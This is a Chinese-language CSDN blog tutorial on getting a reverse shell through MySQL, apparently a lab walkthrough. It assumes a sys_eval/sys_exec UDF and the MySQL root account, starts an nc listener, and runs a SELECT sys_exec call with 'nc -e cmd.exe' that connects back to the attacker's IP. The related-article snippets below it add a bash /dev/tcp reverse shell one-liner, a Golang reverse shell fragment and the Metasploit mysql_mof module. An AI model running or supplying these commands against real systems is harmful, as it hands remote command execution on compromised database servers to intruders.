通过MySQL反弹shell

最新推荐文章于 2025-05-13 15:38:47 发布
最新推荐文章于 2025-05-13 15:38:47 发布
阅读量406 收藏 10
点赞数 11
文章标签: mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lubai60060/article/details/147802816
版权

通过MySQL反弹shell

前提条件

  • 目标服务器的MySQL上已经创建sys_eval()函数,具体方法可见Mysql提权
  • 目标服务器上安装了nc
  • 已有目标服务器上MySQL的root用户
如何安装nc?(windows)

① 下载 Netcat for Windows

  • 官方下载:https://eternallybored.org/misc/netcat/
  • 选择 netcat-win32-1.12.zip,解压后得到 nc.exe

② 把 nc.exe 添加到环境变量

  • nc.exe 放到 C:\Windows\System32\(这样可以直接运行 nc)。
  • 或者,把 nc.exe 所在目录添加到 PATH
[Environment]::SetEnvironmentVariable("Path", "$env:Path;C:\path\to\nc", "User")
  • 重新打开 CMD/PowerShell,运行 nc -h 测试是否成功。

实践

首先在攻击机终端打开监听,这里我选择的是4444端口,要选择一个没有被占用的端口

nc -lvnp 4444

这里我通过navicat连接靶机,输入以下代码即可

SELECT sys_exec('nc -e cmd.exe 111.111.111.111 4444');

看到反弹的shell,成功!
请添加图片描述

lubai600000
关注
mysql 反弹shell_反弹shell升级成交互式shell
weixin_39640573的博客
01-27 735
实验环境:A : kali 虚拟机B: centos7.5 虚拟机1. A 机 kali 虚拟机 设置监听 端口root@kali64:~# nc -lvvp 9001# 端口随便定义,没被使用就行2. B机 执行命令反弹shell[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1# ip地...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1553
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
mysql反弹shell
weixin_40416851的博客
02-10 1055
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网。
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 277
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
mysql反弹shell_MySQL Rootkit 反弹Shell--PHP
weixin_39520013的博客
01-19 337
好多人在渗透的时候,知道得到了SA的密码知道该怎么办,但是得到了MYSQL的root密码之后却迷茫了(多说句废话,默认在windows文件夹中保存my.ini里面写有root密码,而且windows有访问的权限,我们学校的服务器就是这么搞到的,汗···),我当初就迷茫过。后来得知用UDF create新函数可以执行命令,但是有时候却会出现意外的情况等等利用不是很好。终于有一天JOLI大叔随手抛给我...
mysql 反弹shell_Discuz-ssrf利用计划任务反弹shell
weixin_39634898的博客
01-27 324
#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看权限是有的经过各种尝试无果,开始了漫长的百度之旅,皇天不负有心人...
mysql 反弹shell_mysql mof+metasploit反弹shell
weixin_35895056的博客
01-27 818
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx//设置登录mysql的密码setusernamexxx//设置登录mysql的用户setrhostxx...
mysql反弹shell_mysql mof+metasploit反弹shell
weixin_39875805的博客
02-02 193
鉴于上篇文章http://z2ppp.blog.51cto.com/11186185/1975985mysql mof提权metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx...
mysql反弹提权_MySQL数据库反弹端口连接提权
weixin_42545292的博客
01-19 845
【51CTO.com原创稿件】在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令。在一般的情况下,也就放弃了。但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:(1)通过网站无法获取webshell(2)Webshell无法执行命令(3)有phpmyadmin和root账号,无法查询或者无法获取网...
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
Mysql提权之反弹shell
热门推荐
weixin_43801718的博客
04-13 5万+
0x01 介绍 Mysql反弹shell提权,也是属于udf提权,只不过应用场景不同,例如没有得到webshell,但是获得了Mysql的root密码,恰好目标的数据库可以外连,那么就可以先将udf.dll文件的内容先插入到数据表中,然后再导出到’lib/plugin’ 0x02 适用场景 取较高权限的,比如获取webshell,或者获取到webshell无法执行高权限命令的。特别是有了SQL执行...
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 571
知识是不断从学习中得到的,经验是从尝试中得到的!
网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
2302_81156108的博客
09-07 2227
学习网络安全的一些心得希望对大家起到一些帮助
MySQL 8.0安装(压缩包方式)
微信公众号: 后端码匠
05-12 275
本文详细介绍了如何在Windows系统上通过压缩包方式安装MySQL 8.0。首先,从官网下载并解压MySQL安装包。接着,确保系统中没有其他MySQL版本残留,并使用管理员权限的CMD删除旧服务。然后,切换到解压目录的bin文件夹,执行初始化命令生成临时密码,并安装MySQL服务。启动MySQL后,使用临时密码登录并修改密码。最后,配置系统环境变量和my.ini文件,以完成MySQL的安装和初始化设置。
SparkSQL操作Mysql
最新发布
2301_82309776的博客
05-13 294
SparkSQL 提供了强大的功能来连接和操作 MySQL 数据库,支持读取数据、写入数据以及执行 SQL 查询。下面将详细介绍如何使用 SparkSQL 与 MySQL 进行交互,并提供完整的代码示例。,并将 JAR 文件添加到 Spark 的 classpath 中。在创建 SparkSession 时,通过。
mysql数据表日期时间的类型还在用varchar或者char?
weixin_44826783的博客
05-09 209
②当我们通过sql查询进行比较大小的话,比如where colume > '2025-05-09 10:38:15',数据库查询的时候是会一个字符一个字符进行比较,而DateTime和TimeStamp在比较的时候速度更快,数据库会直接转化为数值类型进行比较。①字符串的日期时间,存储占用的字节数多,如果一个字符按照一个字节,那么yyyy-MM-dd hh:mm:ss 这种格式应该是19个字符,也就是19个字节,DateTime占用的字节数是5-8,TimeStamp占用的字节数是4-7;
SQLite 转换为 MySQL 数据库
坚持写博客,大家的关注是我前进的动力!
05-09 982
FIELDS TERMINATED BY ','指定了字段之间的分隔符是逗号,ENCLOSED BY '"'指定了字段的值被双引号包围(这是 CSV 文件常见的格式)LINES TERMINATED BY '\n'指定了行的终止符是换行符。• 这里需要注意,MySQL 中添加了AUTO_INCREMENT属性来自动增加主键值(类似于 SQLite 的PRIMARY KEY特性),并且指定了存储引擎(如 InnoDB)和字符集(如 utf8mb4)。• 分析 SQLite 数据库中的表结构。
MySQL 全量、增量备份与恢复
2501_91344566的博客
05-12 936
与完全备份不同,增量备份没有重复数据,备份量不大,时间短;但其恢复麻烦,需要上次完全备份及完全备份之后所有的增量备份才能恢复,而且要对所有增量备份进行逐个反推恢复。MySQL 没有提供直接的增量备份办法,可以通过MySQL 提供的二进制日志(binary logs)间接实现增量备份。
MYSQL 的缓存策略(四)
Z2460986913的博客
05-13 665
用户直接从。
mysql提权反弹shell
02-24
#### 反弹Shell的具体实施方式 考虑到不同操作系统间的差异性,这里提供了一种基于Linux系统的方案作为例子: ```bash echo "bash -i >& /dev/tcp/192.168.44.138/4444 0>&1" | bash ``` 这段命令通过`echo`构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值